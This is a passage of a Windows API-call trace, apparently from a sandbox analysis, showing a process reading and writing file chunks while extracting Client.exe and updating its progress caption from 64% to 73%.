lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.806] GetTickCount () returned 0x1d61375 [0272.806] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.806] GetTickCount () returned 0x1d61375 [0272.806] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x10ad, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x10ad, lpOverlapped=0x0) returned 1 [0272.807] GetTickCount () returned 0x1d61375 [0272.807] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.807] GetTickCount () returned 0x1d61375 [0272.807] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.808] GetTickCount () returned 0x1d61375 [0272.808] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2284, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2284, lpOverlapped=0x0) returned 1 [0272.808] GetTickCount () returned 0x1d61375 [0272.808] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.809] GetTickCount () returned 0x1d61375 [0272.809] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.809] GetTickCount () returned 0x1d61375 [0272.809] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x64ad, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x64ad, lpOverlapped=0x0) returned 1 [0272.810] GetTickCount () returned 0x1d61375 [0272.811] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.811] GetTickCount () returned 0x1d61375 [0272.811] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.812] GetTickCount () returned 0x1d61375 [0272.812] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x161b, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x161b, lpOverlapped=0x0) returned 1 [0272.813] GetTickCount () returned 0x1d61375 [0272.813] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.813] GetTickCount () returned 0x1d61375 [0272.813] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.814] GetTickCount () returned 0x1d61375 [0272.814] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1063, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1063, lpOverlapped=0x0) returned 1 [0272.814] GetTickCount () returned 0x1d61375 [0272.814] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.814] GetTickCount () returned 0x1d61375 [0272.814] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.815] GetTickCount () returned 0x1d61375 [0272.815] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x3809, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x3809, lpOverlapped=0x0) returned 1 [0272.815] GetTickCount () returned 0x1d61375 [0272.815] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.816] GetTickCount () returned 0x1d61375 [0272.816] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.816] GetTickCount () returned 0x1d61375 [0272.816] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1296, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1296, lpOverlapped=0x0) returned 1 [0272.817] GetTickCount () returned 0x1d61375 [0272.817] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.817] GetTickCount () returned 0x1d61375 [0272.817] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.818] GetTickCount () returned 0x1d61375 [0272.818] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x11d7, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x11d7, lpOverlapped=0x0) returned 1 [0272.818] GetTickCount () returned 0x1d61375 [0272.818] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.818] GetTickCount () returned 0x1d61375 [0272.818] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.819] GetTickCount () returned 0x1d61375 [0272.819] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xce4, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xce4, lpOverlapped=0x0) returned 1 [0272.820] GetTickCount () returned 0x1d61385 [0272.820] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.820] GetTickCount () returned 0x1d61385 [0272.820] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.822] GetTickCount () returned 0x1d61385 [0272.822] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x986, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x986, lpOverlapped=0x0) returned 1 [0272.822] GetTickCount () returned 0x1d61385 [0272.822] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.822] GetTickCount () returned 0x1d61385 [0272.822] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.823] GetTickCount () returned 0x1d61385 [0272.823] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x55a, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x55a, lpOverlapped=0x0) returned 1 [0272.823] GetTickCount () returned 0x1d61385 [0272.823] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.823] GetTickCount () returned 0x1d61385 [0272.823] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.824] GetTickCount () returned 0x1d61385 [0272.824] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xe5a, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xe5a, lpOverlapped=0x0) returned 1 [0272.824] GetTickCount () returned 0x1d61385 [0272.824] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.825] GetTickCount () returned 0x1d61385 [0272.825] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.825] GetTickCount () returned 0x1d61385 [0272.825] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1765, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1765, lpOverlapped=0x0) returned 1 [0272.826] GetTickCount () returned 0x1d61385 [0272.826] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.826] GetTickCount () returned 0x1d61385 [0272.826] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.827] GetTickCount () returned 0x1d61385 [0272.827] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x12ba, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x12ba, lpOverlapped=0x0) returned 1 [0272.827] GetTickCount () returned 0x1d61385 [0272.827] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.828] GetTickCount () returned 0x1d61385 [0272.828] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.828] GetTickCount () returned 0x1d61385 [0272.828] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x3d18, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x3d18, lpOverlapped=0x0) returned 1 [0272.829] GetTickCount () returned 0x1d61385 [0272.829] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.829] GetTickCount () returned 0x1d61385 [0272.829] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.830] GetTickCount () returned 0x1d61385 [0272.830] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x391c, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x391c, lpOverlapped=0x0) returned 1 [0272.830] GetTickCount () returned 0x1d61385 [0272.831] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.831] GetTickCount () returned 0x1d61385 [0272.831] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.837] GetTickCount () returned 0x1d61395 [0272.837] MulDiv (nNumber=1245184, nNumerator=100, nDenominator=1931892) returned 64 [0272.837] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 64%") returned 7 [0272.837] lstrlenA (lpString="Extract: Client.exe") returned 19 [0272.837] lstrlenA (lpString="... 64%") returned 7 [0272.837] lstrcatA (in: lpString1="Extract: Client.exe", lpString2="... 64%" | out: lpString1="Extract: Client.exe... 64%") returned="Extract: Client.exe... 64%" [0272.837] SetWindowTextA (hWnd=0x20324, lpString="Extract: Client.exe... 64%") returned 1 [0272.839] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x12 [0272.839] SendMessageA (hWnd=0x302f8, Msg=0x1006, wParam=0x0, lParam=0x2d6fcf8) returned 0x1 [0272.839] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x11, lParam=0x0) returned 0x1 [0272.840] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.840] GetTickCount () returned 0x1d61395 [0272.840] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6df, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6df, lpOverlapped=0x0) returned 1 [0272.841] GetTickCount () returned 0x1d61395 [0272.841] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.841] GetTickCount () returned 0x1d61395 [0272.841] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.842] GetTickCount () returned 0x1d61395 [0272.842] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.843] GetTickCount () returned 0x1d61395 [0272.843] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x14e3, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x14e3, lpOverlapped=0x0) returned 1 [0272.843] GetTickCount () returned 0x1d61395 [0272.843] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.843] GetTickCount () returned 0x1d61395 [0272.843] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.844] GetTickCount () returned 0x1d61395 [0272.844] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xb11, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xb11, lpOverlapped=0x0) returned 1 [0272.844] GetTickCount () returned 0x1d61395 [0272.844] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.845] GetTickCount () returned 0x1d61395 [0272.845] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.845] GetTickCount () returned 0x1d61395 [0272.846] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2db0, lpOverlapped=0x0) returned 1 [0272.846] GetTickCount () returned 0x1d61395 [0272.846] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.846] GetTickCount () returned 0x1d61395 [0272.846] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.847] GetTickCount () returned 0x1d61395 [0272.847] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x725e, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x725e, lpOverlapped=0x0) returned 1 [0272.849] GetTickCount () returned 0x1d61395 [0272.849] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.850] GetTickCount () returned 0x1d61395 [0272.850] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7b33, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7b33, lpOverlapped=0x0) returned 1 [0272.850] GetTickCount () returned 0x1d61395 [0272.850] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.851] GetTickCount () returned 0x1d613a4 [0272.851] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.852] GetTickCount () returned 0x1d613a4 [0272.852] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x5e3, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x5e3, lpOverlapped=0x0) returned 1 [0272.852] GetTickCount () returned 0x1d613a4 [0272.852] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.852] GetTickCount () returned 0x1d613a4 [0272.852] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.853] GetTickCount () returned 0x1d613a4 [0272.853] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x22b4, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x22b4, lpOverlapped=0x0) returned 1 [0272.853] GetTickCount () returned 0x1d613a4 [0272.854] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.854] GetTickCount () returned 0x1d613a4 [0272.854] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.855] GetTickCount () returned 0x1d613a4 [0272.855] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x105f, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x105f, lpOverlapped=0x0) returned 1 [0272.855] GetTickCount () returned 0x1d613a4 [0272.855] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.856] GetTickCount () returned 0x1d613a4 [0272.856] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.857] GetTickCount () returned 0x1d613a4 [0272.857] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x5719, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x5719, lpOverlapped=0x0) returned 1 [0272.857] GetTickCount () returned 0x1d613a4 [0272.857] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.859] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 73%") returned 7 [0272.859] lstrlenA (lpString="Extract: Client.exe") returned 19 [0272.859] lstrlenA (lpString="... 73%") returned 7 [0272.859] lstrcatA (in: lpString1="Extract: Client.exe", lpString2="... 73%" | out: lpString1="Extract: Client.exe... 73%") returned="Extract: Client.exe... 73%" [0272.859] SetWindowTextA (hWnd=0x20324, lpString="Extract: Client.exe... 73%") returned 1 [0272.861] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x12 [0272.861] SendMessageA (hWnd=0x302f8, Msg=0x1006, wParam=0x0, lParam=0x2d6fcf8) returned 0x1 [0272.862] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x11, lParam=0x0) returned 0x1 [0272.862] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.865] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: 